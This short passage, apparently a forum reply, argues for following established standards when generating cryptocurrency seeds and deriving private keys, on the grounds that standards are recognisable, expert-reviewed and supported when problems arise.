Because following the standard is the established, recognizable and proper manner to do something. There are nearly infinite non-standard ways you can generate a seed, or derive private keys in a deterministic process, but following a standard means you have someone to address a problem in case an issue emerges. Also, standard is being reviewed by people who potentially know more than you do, and are more eligible to define the correct process.